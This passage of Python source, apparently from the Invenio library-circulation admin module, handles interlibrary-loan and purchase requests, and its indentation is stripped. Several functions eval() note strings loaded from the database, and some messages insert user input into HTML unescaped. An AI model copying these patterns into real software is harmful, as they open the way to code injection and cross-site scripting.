period_of_interest_to,
CFG_BIBCIRCULATION_ILL_STATUS_NEW,
str(ill_request_notes),
only_edition, 'book', budget_code)
return list_ill_request(req, CFG_BIBCIRCULATION_ILL_STATUS_NEW, ln)
def register_ill_book_request(req, borrower_id, ln=CFG_SITE_LANG):
"""
Display a form where is possible to searh for an item.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
_ = gettext_set_language(ln)
infos = []
body = bc_templates.tmpl_register_ill_book_request(infos=infos,
borrower_id=borrower_id,
ln=ln)
return page(title=_("Register ILL Book request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def register_ill_book_request_result(req, borrower_id, p, f, ln=CFG_SITE_LANG):
"""
Search an item and return a list with all the possible results. To retrieve
the information desired, we use the method 'perform_request_search' (from
search_engine.py). In the case of BibCirculation, we are just looking for
books (items) inside the collection 'Books'.
@type p: string
@param p: search pattern
@type f: string
@param f: search field
@return: list of recids
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if p == '':
infos.append(_('Empty string.') + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_register_ill_book_request(infos=infos,
borrower_id=borrower_id,
ln=ln)
else:
if f == 'barcode':
p = p.strip('\'" \t')
recid = db.get_id_bibrec(p)
if recid is None:
infos.append(_('The barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s does not exist on BibCirculation database.') % {'x_barcode': p, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
body = bc_templates.tmpl_register_ill_book_request(infos=infos,
borrower_id=borrower_id,
ln=ln)
else:
body = bc_templates.tmpl_register_ill_book_request_result(
result=[recid],
borrower_id=borrower_id,
ln=ln)
else:
result = perform_request_search(cc="Books", sc="1", p=p, f=f)
if len(result) == 0:
return register_ill_request_with_no_recid_step1(req,
borrower_id, ln)
else:
body = bc_templates.tmpl_register_ill_book_request_result(
result=result,
borrower_id=borrower_id,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
return page(title=_("Register ILL Book request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def register_ill_article_request_step1(req, ln=CFG_SITE_LANG):
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
body = bc_templates.tmpl_register_ill_article_request_step1(infos=infos,
ln=ln)
return page(title=_("Register ILL Article request"),
uid=id_user,
req=req,
body=body,
metaheaderadd = "<link rel=\"stylesheet\" href=\"%s/vendors/jquery-ui/themes/redmond/jquery-ui.css\" type=\"text/css\" />"%(CFG_SITE_SECURE_URL),
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def register_ill_article_request_step2(req, periodical_title, article_title,
author, report_number, volume, issue,
pages, year, budget_code, issn,
period_of_interest_from,
period_of_interest_to,
additional_comments, key, string,
ln=CFG_SITE_LANG):
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if key and not string:
infos.append(_('Empty string.') + ' ' + _('Please, try again.'))
article_info = (periodical_title, article_title, author, report_number,
volume, issue, pages, year, issn)
request_details = (period_of_interest_from, period_of_interest_to,
budget_code, additional_comments)
body = bc_templates.tmpl_register_ill_article_request_step2(
article_info=article_info,
request_details=request_details,
result=None, key=key,
string=string, infos=infos,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
return page(title=_("Register ILL request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
result = search_user(key, string)
borrowers_list = []
if len(result) == 0 and key:
if CFG_CERN_SITE:
infos.append(_("0 borrowers found.") + ' ' +_("Search by CCID."))
else:
new_borrower_link = create_html_link(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/add_new_borrower_step1',
{'ln': ln}, _("Register new borrower."))
message = _("0 borrowers found.") + ' ' + new_borrower_link
infos.append(message)
else:
for user in result:
borrower_data = db.get_borrower_data_by_id(user[0])
borrowers_list.append(borrower_data)
if validate_date_format(period_of_interest_from) is False:
infos = []
infos.append(_("The period of interest %(x_strong_tag_open)sFrom: %(x_date)s%(x_strong_tag_close)s is not a valid date or date format") % {'x_date': period_of_interest_from, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
body = bc_templates.tmpl_register_ill_article_request_step1(infos=infos,
ln=ln)
elif validate_date_format(period_of_interest_to) is False:
infos = []
infos.append(_("The period of interest %(x_strong_tag_open)sTo: %(x_date)s%(x_strong_tag_close)s is not a valid date or date format") % {'x_date': period_of_interest_to, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
body = bc_templates.tmpl_register_ill_article_request_step1(infos=infos,
ln=ln)
else:
article_info = (periodical_title, article_title, author, report_number,
volume, issue, pages, year, issn)
request_details = (period_of_interest_from, period_of_interest_to,
budget_code, additional_comments)
body = bc_templates.tmpl_register_ill_article_request_step2(
article_info=article_info,
request_details=request_details,
result=borrowers_list,
key=key, string=string,
infos=infos, ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
return invenio.webpage.page(title=_("Register ILL request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def register_ill_article_request_step3(req, periodical_title, title, authors,
report_number, volume, issue,
page_number, year, issn, user_info,
request_details, ln=CFG_SITE_LANG):
#id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
#info = (title, authors, "", "", year, "", issn)
#create_ill_record(info)
item_info = {'periodical_title': periodical_title, 'title': title,
'authors': authors, 'place': "", 'publisher': "",
'year' : year, 'edition': "", 'issn' : issn,
'volume': volume, 'issue': issue, 'page': page_number }
(period_of_interest_from, period_of_interest_to, budget_code,
library_notes) = request_details
only_edition = ""
if user_info is None:
return register_ill_article_request_step2(req, periodical_title, title,
authors, report_number, volume, issue,
page_number, year, budget_code, issn,
period_of_interest_from,
period_of_interest_to,
library_notes, 'name', None, ln)
else:
borrower_id = user_info[0]
ill_request_notes = {}
if library_notes:
ill_request_notes[time.strftime("%Y-%m-%d %H:%M:%S")] \
= str(library_notes)
db.ill_register_request_on_desk(borrower_id, item_info,
period_of_interest_from,
period_of_interest_to,
CFG_BIBCIRCULATION_ILL_STATUS_NEW,
str(ill_request_notes),
only_edition, 'article', budget_code)
return list_ill_request(req, CFG_BIBCIRCULATION_ILL_STATUS_NEW, ln)
def register_purchase_request_step1(req, request_type, recid, title, authors,
place, publisher, year, edition, this_edition_only,
isbn, standard_number,
budget_code, cash, period_of_interest_from,
period_of_interest_to, additional_comments,
ln=CFG_SITE_LANG):
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
if recid:
fields = (request_type, recid, budget_code, cash,
period_of_interest_from, period_of_interest_to,
additional_comments)
else:
fields = (request_type, title, authors, place, publisher, year, edition,
this_edition_only, isbn, standard_number, budget_code,
cash, period_of_interest_from, period_of_interest_to,
additional_comments)
body = bc_templates.tmpl_register_purchase_request_step1(infos=infos,
fields=fields, admin=True, ln=ln)
return page(title=_("Register purchase request"),
uid=id_user,
req=req,
body=body,
language=ln,
metaheaderadd='<link rel="stylesheet" ' \
'href="%s/vendors/jquery-ui/themes/redmond/jquery-ui.css" ' \
'type="text/css" />' % CFG_SITE_SECURE_URL,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def register_purchase_request_step2(req, request_type, recid, title, authors,
place, publisher, year, edition, this_edition_only,
isbn, standard_number,
budget_code, cash, period_of_interest_from,
period_of_interest_to, additional_comments,
p, f, ln=CFG_SITE_LANG):
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
infos = []
if cash and budget_code == '':
budget_code = 'cash'
if recid:
fields = (request_type, recid, budget_code, cash,
period_of_interest_from, period_of_interest_to,
additional_comments)
else:
fields = (request_type, title, authors, place, publisher, year, edition,
this_edition_only, isbn, standard_number, budget_code,
cash, period_of_interest_from, period_of_interest_to,
additional_comments)
if budget_code == '' and not cash:
infos.append(_("Payment method information is mandatory. \
Please, type your budget code or tick the 'cash' checkbox."))
body = bc_templates.tmpl_register_purchase_request_step1(infos=infos,
fields=fields, admin=True, ln=ln)
else:
########################
########################
if p and not f:
infos.append(_('Empty string.') + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_register_purchase_request_step2(
infos=infos, fields=fields,
result=None, p=p, f=f, ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
return page(title=_("Register ILL request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
result = search_user(f, p)
borrowers_list = []
if len(result) == 0 and f:
if CFG_CERN_SITE:
infos.append(_("0 borrowers found.") + ' ' +_("Search by CCID."))
else:
new_borrower_link = create_html_link(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/add_new_borrower_step1',
{'ln': ln}, _("Register new borrower."))
message = _("0 borrowers found.") + ' ' + new_borrower_link
infos.append(message)
else:
for user in result:
borrower_data = db.get_borrower_data_by_id(user[0])
borrowers_list.append(borrower_data)
body = bc_templates.tmpl_register_purchase_request_step2(
infos=infos, fields=fields,
result=borrowers_list, p=p,
f=f, ln=ln)
########################
########################
return page(title=_("Register purchase request"),
uid=id_user,
req=req,
body=body,
language=ln,
metaheaderadd='<link rel="stylesheet" ' \
'href="%s/vendors/jquery-ui/themes/redmond/jquery-ui.css" ' \
'type="text/css" />' % CFG_SITE_SECURE_URL,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def register_purchase_request_step3(req, request_type, recid, title, authors,
place, publisher, year, edition, this_edition_only,
isbn, standard_number,
budget_code, cash, period_of_interest_from,
period_of_interest_to, additional_comments,
borrower_id, ln=CFG_SITE_LANG):
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
infos = []
if recid:
fields = (request_type, recid, budget_code, cash,
period_of_interest_from, period_of_interest_to,
additional_comments)
else:
fields = (request_type, title, authors, place, publisher, year, edition,
this_edition_only, isbn, standard_number, budget_code,
cash, period_of_interest_from, period_of_interest_to,
additional_comments)
if budget_code == '' and not cash:
infos.append(_("Payment method information is mandatory. \
Please, type your budget code or tick the 'cash' checkbox."))
body = bc_templates.tmpl_register_purchase_request_step1(infos=infos,
fields=fields, admin=True, ln=ln)
else:
if recid:
item_info = "{'recid': " + str(recid) + "}"
title = book_title_from_MARC(recid)
else:
item_info = {'title': title, 'authors': authors, 'place': place,
'publisher': publisher, 'year' : year, 'edition': edition,
'isbn' : isbn, 'standard_number': standard_number}
ill_request_notes = {}
if additional_comments:
ill_request_notes[time.strftime("%Y-%m-%d %H:%M:%S")] \
= str(additional_comments)
if cash and budget_code == '':
budget_code = 'cash'
if borrower_id:
borrower_email = db.get_borrower_email(borrower_id)
else:
borrower_email = db.get_invenio_user_email(id_user)
borrower_id = db.get_borrower_id_by_email(borrower_email)
db.ill_register_request_on_desk(borrower_id, item_info,
period_of_interest_from,
period_of_interest_to,
CFG_BIBCIRCULATION_ACQ_STATUS_NEW,
str(ill_request_notes),
this_edition_only, request_type, budget_code)
msg_for_user = load_template('purchase_notification') % title
send_email(fromaddr = CFG_BIBCIRCULATION_ILLS_EMAIL,
toaddr = borrower_email,
subject = _("Your book purchase request"),
header = '', footer = '',
content = msg_for_user,
attempt_times=1,
attempt_sleeptime=10
)
return redirect_to_url(req,
'%s/admin2/bibcirculation/list_purchase?ln=%s&status=%s' % \
(CFG_SITE_SECURE_URL, ln,
CFG_BIBCIRCULATION_ACQ_STATUS_NEW))
return page(title=_("Register purchase request"),
uid=id_user,
req=req,
body=body,
language=ln,
metaheaderadd='<link rel="stylesheet" ' \
'href="%s/vendors/jquery-ui/themes/redmond/jquery-ui.css" ' \
'type="text/css" />' % CFG_SITE_SECURE_URL,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def ill_request_details_step1(req, delete_key, ill_request_id, new_status,
ln=CFG_SITE_LANG):
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if delete_key and ill_request_id:
if looks_like_dictionary(db.get_ill_request_notes(ill_request_id)):
library_notes = eval(db.get_ill_request_notes(ill_request_id))
if delete_key in library_notes.keys():
del library_notes[delete_key]
db.update_ill_request_notes(ill_request_id, library_notes)
if new_status:
db.update_ill_request_status(ill_request_id, new_status)
ill_request_borrower_details = \
db.get_ill_request_borrower_details(ill_request_id)
if ill_request_borrower_details is None \
or len(ill_request_borrower_details) == 0:
infos.append(_("Borrower request details not found."))
ill_request_details = db.get_ill_request_details(ill_request_id)
if ill_request_details is None or len(ill_request_details) == 0:
infos.append(_("Request not found."))
libraries = db.get_external_libraries()
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
title = _("ILL request details")
if infos == []:
body = bc_templates.tmpl_ill_request_details_step1(
ill_request_id=ill_request_id,
ill_request_details=ill_request_details,
libraries=libraries,
ill_request_borrower_details=ill_request_borrower_details,
ln=ln)
else:
body = bc_templates.tmpl_display_infos(infos, ln)
return page(title=title,
uid=id_user,
req=req,
metaheaderadd='<link rel="stylesheet" ' \
'href="%s/vendors/jquery-ui/themes/redmond/jquery-ui.css" ' \
'type="text/css" />' % CFG_SITE_SECURE_URL,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def ill_request_details_step2(req, delete_key, ill_request_id, new_status,
library_id, request_date, expected_date,
arrival_date, due_date, return_date,
cost, _currency, barcode, library_notes,
book_info, article_info, ln=CFG_SITE_LANG):
#id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if delete_key and ill_request_id:
if looks_like_dictionary(db.get_ill_request_notes(ill_request_id)):
library_previous_notes = eval(db.get_ill_request_notes(ill_request_id))
if delete_key in library_previous_notes.keys():
del library_previous_notes[delete_key]
db.update_ill_request_notes(ill_request_id, library_previous_notes)
if db.get_ill_request_notes(ill_request_id):
if looks_like_dictionary(db.get_ill_request_notes(ill_request_id)):
library_previous_notes = eval(db.get_ill_request_notes(ill_request_id))
else:
library_previous_notes = {}
else:
library_previous_notes = {}
if library_notes:
library_previous_notes[time.strftime("%Y-%m-%d %H:%M:%S")] = \
str(library_notes)
if new_status == CFG_BIBCIRCULATION_LOAN_STATUS_RETURNED:
borrower_id = db.get_ill_borrower(ill_request_id)
barcode = db.get_ill_barcode(ill_request_id)
db.update_ill_loan_status(borrower_id, barcode, return_date, 'ill')
db.update_ill_request(ill_request_id, library_id, request_date,
expected_date, arrival_date, due_date, return_date,
new_status, cost, barcode,
str(library_previous_notes))
request_type = db.get_ill_request_type(ill_request_id)
if request_type == 'book':
item_info = book_info
else:
item_info = article_info
db.update_ill_request_item_info(ill_request_id, item_info)
if new_status == CFG_BIBCIRCULATION_ILL_STATUS_ON_LOAN:
# Redirect to an email template when the ILL 'book' arrives
# (Not for articles.)
subject = _("ILL received: ")
book_info = db.get_ill_book_info(ill_request_id)
if looks_like_dictionary(book_info):
book_info = eval(book_info)
if 'recid' in book_info:
subject += "'" + book_title_from_MARC(int(book_info['recid'])) + "'"
bid = db.get_ill_borrower(ill_request_id)
msg = load_template("ill_received")
return redirect_to_url(req,
create_url(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/borrower_notification',
{'borrower_id': bid,
'subject': subject,
'load_msg_template': False,
'template': msg,
'from_address': CFG_BIBCIRCULATION_ILLS_EMAIL
}
)
)
return list_ill_request(req, new_status, ln)
def purchase_details_step1(req, delete_key, ill_request_id, new_status,
ln=CFG_SITE_LANG):
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if delete_key and ill_request_id:
if looks_like_dictionary(db.get_ill_request_notes(ill_request_id)):
library_notes = eval(db.get_ill_request_notes(ill_request_id))
if delete_key in library_notes.keys():
del library_notes[delete_key]
db.update_ill_request_notes(ill_request_id, library_notes)
if new_status:
db.update_ill_request_status(ill_request_id, new_status)
ill_request_borrower_details = \
db.get_purchase_request_borrower_details(ill_request_id)
if ill_request_borrower_details is None \
or len(ill_request_borrower_details) == 0:
infos.append(_("Borrower request details not found."))
ill_request_details = db.get_ill_request_details(ill_request_id)
if ill_request_details is None or len(ill_request_details) == 0:
infos.append(_("Request not found."))
vendors = db.get_all_vendors()
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
if infos == []:
body = bc_templates.tmpl_purchase_details_step1(
ill_request_id=ill_request_id,
ill_request_details=ill_request_details,
libraries=vendors,
ill_request_borrower_details=ill_request_borrower_details,
ln=ln)
title = _("Purchase details")
else:
body = bc_templates.tmpl_display_infos(infos, ln)
return page(title=title,
uid=id_user,
req=req,
metaheaderadd = "<link rel=\"stylesheet\" href=\"%s/vendors/jquery-ui/themes/redmond/jquery-ui.css\" type=\"text/css\" />" % CFG_SITE_SECURE_URL,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def purchase_details_step2(req, delete_key, ill_request_id, new_status,
library_id, request_date, expected_date,
arrival_date, due_date, return_date,
cost, budget_code, library_notes,
item_info, ln=CFG_SITE_LANG):
#id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if delete_key and ill_request_id:
if looks_like_dictionary(db.get_ill_request_notes(ill_request_id)):
library_previous_notes = eval(db.get_ill_request_notes(ill_request_id))
if delete_key in library_previous_notes.keys():
del library_previous_notes[delete_key]
db.update_ill_request_notes(ill_request_id, library_previous_notes)
if db.get_ill_request_notes(ill_request_id):
if looks_like_dictionary(db.get_ill_request_notes(ill_request_id)):
library_previous_notes = eval(db.get_ill_request_notes(ill_request_id))
else:
library_previous_notes = {}
else:
library_previous_notes = {}
if library_notes:
library_previous_notes[time.strftime("%Y-%m-%d %H:%M:%S")] = \
str(library_notes)
if new_status == CFG_BIBCIRCULATION_LOAN_STATUS_RETURNED:
borrower_id = db.get_ill_borrower(ill_request_id)
db.update_purchase_request(ill_request_id, library_id, request_date,
expected_date, arrival_date, due_date, return_date,
new_status, cost, budget_code,
str(library_previous_notes))
request_type = db.get_ill_request_type(ill_request_id)
if request_type not in CFG_BIBCIRCULATION_PROPOSAL_TYPE:
db.update_ill_request_item_info(ill_request_id, item_info)
if new_status in (CFG_BIBCIRCULATION_PROPOSAL_STATUS_ON_ORDER,
CFG_BIBCIRCULATION_PROPOSAL_STATUS_PUT_ASIDE):
barcode = db.get_ill_barcode(ill_request_id)
if new_status == CFG_BIBCIRCULATION_PROPOSAL_STATUS_ON_ORDER:
db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_ON_ORDER, barcode)
subject = _("Book suggestion accepted: ")
template = "proposal_acceptance"
else:
db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_UNDER_REVIEW, barcode)
subject = _("Book suggestion refused: ")
template = "proposal_refusal"
book_info = db.get_ill_book_info(ill_request_id)
if looks_like_dictionary(book_info):
book_info = eval(book_info)
if 'recid' in book_info:
bid = db.get_ill_borrower(ill_request_id)
if db.has_loan_request(bid, book_info['recid']):
subject += "'" + book_title_from_MARC(int(book_info['recid'])) + "'"
return redirect_to_url(req,
create_url(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/borrower_notification',
{'borrower_id': bid,
'subject': subject,
'template': template,
'from_address': CFG_BIBCIRCULATION_ILLS_EMAIL
}
)
)
if new_status == CFG_BIBCIRCULATION_PROPOSAL_STATUS_RECEIVED:
barcode = db.get_ill_barcode(ill_request_id)
# Reset the item description to the default value.
db.set_item_description(barcode, '-')
#db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_IN_PROCESS, barcode)
borrower_id = db.get_ill_borrower(ill_request_id)
recid = db.get_id_bibrec(barcode)
if db.has_loan_request(borrower_id, recid):
#If an ILL has already been created(After the book had been put aside), there
#would be no waiting request by the proposer.
db.update_loan_request_status(CFG_BIBCIRCULATION_REQUEST_STATUS_WAITING,
barcode=barcode,
borrower_id=borrower_id)
return redirect_to_url(req,
'%s/admin2/bibcirculation/update_item_info_step4?barcode=%s' % \
(CFG_SITE_SECURE_URL, barcode))
if new_status == CFG_BIBCIRCULATION_ACQ_STATUS_RECEIVED:
subject = _("Purchase received: ")
book_info = db.get_ill_book_info(ill_request_id)
if looks_like_dictionary(book_info):
book_info = eval(book_info)
if 'recid' in book_info:
subject += "'" + book_title_from_MARC(int(book_info['recid'])) + "'"
bid = db.get_ill_borrower(ill_request_id)
if budget_code == 'cash':
msg = load_template("purchase_received_cash") % cost
else:
msg = load_template("purchase_received_tid") % cost
return redirect_to_url(req,
create_url(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/borrower_notification',
{'borrower_id': bid,
'subject': subject,
'load_msg_template': False,
'template': msg,
'from_address': CFG_BIBCIRCULATION_ILLS_EMAIL
}
)
)
if new_status in CFG_BIBCIRCULATION_ACQ_STATUS or \
new_status == CFG_BIBCIRCULATION_PROPOSAL_STATUS_ON_ORDER:
# The items 'on order' whether for acquisition for the library or purchase
# on behalf of the user are displayed in the same list.
return redirect_to_url(req,
'%s/admin2/bibcirculation/list_purchase?ln=%s&status=%s' % \
(CFG_SITE_SECURE_URL, ln, new_status))
else:
return redirect_to_url(req,
'%s/admin2/bibcirculation/list_proposal?ln=%s&status=%s' % \
(CFG_SITE_SECURE_URL, ln, new_status))
def get_ill_library_notes(req, ill_id, delete_key, library_notes,
ln=CFG_SITE_LANG):
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if delete_key and ill_id:
if looks_like_dictionary(db.get_ill_notes(ill_id)):
ill_notes = eval(db.get_ill_notes(ill_id))
if delete_key in ill_notes.keys():
del ill_notes[delete_key]
db.update_ill_notes(ill_id, ill_notes)
elif library_notes:
if db.get_ill_notes(ill_id):
if looks_like_dictionary(db.get_ill_notes(ill_id)):
ill_notes = eval(db.get_ill_notes(ill_id))
else:
ill_notes = {}
else:
ill_notes = {}
ill_notes[time.strftime("%Y-%m-%d %H:%M:%S")] = str(library_notes)
db.update_ill_notes(ill_id, ill_notes)
ill_notes = db.get_ill_notes(ill_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_ill_notes(ill_notes=ill_notes,
ill_id=ill_id,
ln=ln)
return page(title=_("ILL notes"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def list_ill_request(req, status, ln=CFG_SITE_LANG):
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
ill_req = db.get_ill_requests(status)
body = bc_templates.tmpl_list_ill(ill_req=ill_req, ln=ln)
return page(title=_("List of ILL requests"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def list_purchase(req, status, recid=None, ln=CFG_SITE_LANG):
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if recid:
# Purchases of a particular item to be displayed in the item info page.
purchase_reqs = db.get_item_purchases(status, recid)
else:
purchase_reqs = db.get_purchases(status)
body = bc_templates.tmpl_list_purchase(purchase_reqs, ln=ln)
return page(title=_("List of purchase requests"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def list_proposal(req, status, ln=CFG_SITE_LANG):
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if status == "requests-putaside":
requests = db.get_requests_on_put_aside_proposals()
body = bc_templates.tmpl_list_requests_on_put_aside_proposals(requests, ln=ln)
title=_("List of requests on put aside proposals")
else:
proposals = db.get_proposals(status)
body = bc_templates.tmpl_list_proposal(proposals, ln=ln)
title=_("List of proposals")
return page(title=title,
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def ill_search(req, ln=CFG_SITE_LANG):
infos = []
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
body = bc_templates.tmpl_ill_search(infos=infos, ln=ln)
return page(title=_("ILL search"),
uid=id_user,
req=req,
body=body,
language=ln,
metaheaderadd='<link rel="stylesheet" href="%s/vendors/jquery-ui/themes/redmond/jquery-ui.min.css" '\
'type="text/css" />' % CFG_SITE_SECURE_URL,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def ill_search_result(req, p, f, date_from, date_to, ln):
"""
Search an item and return a list with all the possible results. To retrieve
the information desired, we use the method 'perform_request_search' (from
search_engine.py). In the case of BibCirculation, we are just looking for
books (items) inside the collection 'Books'.
@type p: string
@param p: search pattern
@type f: string
@param f: search field
@return: list of recids
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
#id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if not has_date_format(date_from):
date_from = '0000-00-00'
if not has_date_format(date_to):
date_to = '9999-12-31'
if f == 'title':
